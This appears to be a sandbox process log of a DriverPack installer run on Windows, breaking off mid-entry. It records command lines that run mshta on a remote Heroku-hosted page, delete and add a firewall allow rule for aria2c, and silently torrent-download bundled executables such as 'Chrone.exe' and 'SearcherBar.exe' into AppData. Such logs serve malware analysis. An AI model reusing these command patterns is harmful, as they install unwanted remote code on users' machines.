expand "C:\Users\Admin\AppData\Local\Temp\dwnl_22688\dwnl_beetle-cab.cab" -F:* C:\Users\Admin\AppData\Local\Temp

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\beetle-cab\7za.exe x -y -aoa -pbeetle "C:\Users\Admin\AppData\Local\Temp\beetle-cab\arc.7z" -o"C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack" > "C:\Users\Admin\AppData\Local\Temp\dwnl_22688\log_7zip.txt"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\7za.exe

C:\Users\Admin\AppData\Local\Temp\beetle-cab\7za.exe x -y -aoa -pbeetle "C:\Users\Admin\AppData\Local\Temp\beetle-cab\arc.7z" -o"C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\start.bat" && echo %errorlevel% > "C:\Users\Admin\AppData\Local\Temp\dwnl_22688\log_runAsAdmin.txt"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\start.bat"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\run.hta" --sfx

C:\Windows\SysWOW64\rundll32.exe

rundll32 kernel32,Sleep

C:\Windows\SysWOW64\mshta.exe

C:\Windows\system32\mshta.exe "http://dwrapper-prod.herokuapp.com/bin/watcher.html"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c "netsh advfirewall firewall delete rule name="DriverPack aria2c.exe" || echo Done & call echo Done %^errorLevel% > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\run_command_33339.txt""

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall delete rule name="DriverPack aria2c.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c "netsh advfirewall firewall add rule name="DriverPack aria2c.exe" dir=in action=allow program="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\aria2c.exe" || echo Done & call echo Done %^errorLevel% > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\run_command_52998.txt""

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="DriverPack aria2c.exe" dir=in action=allow program="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\aria2c.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/intro.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_50774.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_50774.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/START-INITIAL-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_74738.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_74738.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/START-LOADED-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_85718.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_85718.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/START-SETUP-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_28653.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_28653.txt""

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/START-LOADED-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_85718.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/START-INITIAL-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_74738.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/intro.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_50774.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/START-SETUP-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_28653.log"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x484

C:\Windows\SysWOW64\net.exe

"C:\Windows\System32\net.exe" start wscsvc

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start wscsvc

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-DRIVERS-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_73952.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_73952.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-DRIVERS-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_38778.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_38778.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-DRIVERS-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_81369.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_81369.txt""

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-DRIVERS-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_73952.log"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/TEAM-PROOF-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_90525.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_90525.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/TEAM-PROOF-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_70495.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_70495.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/TEAM-PROOF-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_49623.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_49623.txt""

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-DRIVERS-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_38778.log"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/CONTINUOUS-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_98023.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_98023.txt""

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-DRIVERS-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_81369.log"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/CONTINUOUS-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_34671.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_34671.txt""

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/TEAM-PROOF-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_70495.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/TEAM-PROOF-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_90525.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/TEAM-PROOF-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_49623.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/CONTINUOUS-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_34671.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/CONTINUOUS-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_98023.log"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/ANTIVIRUS-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_43436.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_43436.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/ANTIVIRUS-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_18029.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_18029.txt""

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/ANTIVIRUS-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_43436.log"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/ANTIVIRUS-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_20453.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_20453.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/CONTINUOUS-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_94605.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_94605.txt""

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/ANTIVIRUS-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_18029.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/CONTINUOUS-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_94605.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/ANTIVIRUS-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_20453.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\Tools\driverpack-7za.exe

"C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\Tools\driverpack-7za.exe" a "C:\Users\Admin\AppData\Roaming\DRPSu\snapshots\DriverPack_Snapshot_20240503_165037.zip" "C:\Users\Admin\AppData\Roaming\DRPSu\diagnostics\*"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-DRIVERS-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_47892.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_47892.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-DRIVERS-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_97970.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_97970.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-DRIVERS-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_81232.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_81232.txt""

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-DRIVERS-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_47892.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-DRIVERS-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_81232.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-DRIVERS-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_97970.log"

C:\Windows\SysWOW64\rundll32.exe

rundll32 kernel32,Sleep

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\aria2c.exe" "http://dl.driverpack.io/soft/ab/4/Internet-Start.exe.torrent" --dir="C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS" --quiet --continue --min-split-size=1M --follow-torrent=true --check-integrity --seed-time=0 --bt-stop-timeout=120 || echo Done & call echo Done %^errorLevel% > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\run_command_23893.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\aria2c.exe" "http://dl.driverpack.io/soft/Chrone.exe.torrent" --dir="C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS" --quiet --continue --min-split-size=1M --follow-torrent=true --check-integrity --seed-time=0 --bt-stop-timeout=120 || echo Done & call echo Done %^errorLevel% > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\run_command_2549.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\aria2c.exe" "http://dl.driverpack.io/soft/OperaBlink64_win7.exe.torrent" --dir="C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS" --quiet --continue --min-split-size=1M --follow-torrent=true --check-integrity --seed-time=0 --bt-stop-timeout=120 || echo Done & call echo Done %^errorLevel% > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\run_command_31413.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\aria2c.exe" "http://dl.driverpack.io/soft/OperaXP.exe.torrent" --dir="C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS" --quiet --continue --min-split-size=1M --follow-torrent=true --check-integrity --seed-time=0 --bt-stop-timeout=120 || echo Done & call echo Done %^errorLevel% > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\run_command_96126.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\aria2c.exe" "http://dl.driverpack.io/soft/SearcherBar.exe.torrent" --dir="C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS" --quiet --continue --min-split-size=1M --follow-torrent=true --check-integrity --seed-time=0 --bt-stop-timeout=120 || echo Done & call echo Done %^errorLevel% > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\run_command_57237.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-PROGRAMS_CHECKBOX_USED-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_19312.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_19312.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-PROGRAMS_CHECKBOX_USED-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_51528.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_51528.txt""

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\aria2c.exe

"tools\aria2c.exe" "http://dl.driverpack.io/soft/Chrone.exe.torrent" --dir="C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS" --quiet --continue --min-split-size=1M --follow-torrent=true --check-integrity --seed-time=0 --bt-stop-timeout=120

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\aria2c.exe

"tools\aria2c.exe" "http://dl.driverpack.io/soft/ab/4/Internet-Start.exe.torrent" --dir="C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS" --quiet --continue --min-split-size=1M --follow-torrent=true --check-integrity --seed-time=0 --bt-stop-timeout=120

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\aria2c.exe

"tools\aria2c.exe" "http://dl.driverpack.io/soft/SearcherBar.exe.torrent" --dir="C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS" --quiet --continue --min-split-size=1M --follow-torrent=true --check-integrity --seed-time=0 --bt-stop-timeout=120

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\aria2c.exe

"tools\aria2c.exe" "http://dl.driverpack.io/soft/OperaBlink64_win7.exe.torrent" --dir="C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS" --quiet --continue --min-split-size=1M --follow-torrent=true --check-integrity --seed-time=0 --bt-stop-timeout=120

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\aria2c.exe

"tools\aria2c.exe" "http://dl.driverpack.io/soft/OperaXP.exe.torrent" --dir="C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS" --quiet --continue --min-split-size=1M --follow-torrent=true --check-integrity --seed-time=0 --bt-stop-timeout=120

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-PROGRAMS_CHECKBOX_USED-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_51528.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-PROGRAMS_CHECKBOX_USED-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_19312.log"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-PROTECT-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_7695.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_7695.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-PROTECT-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_99287.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_99287.txt""

C:\Windows\SysWOW64\cmd.exe

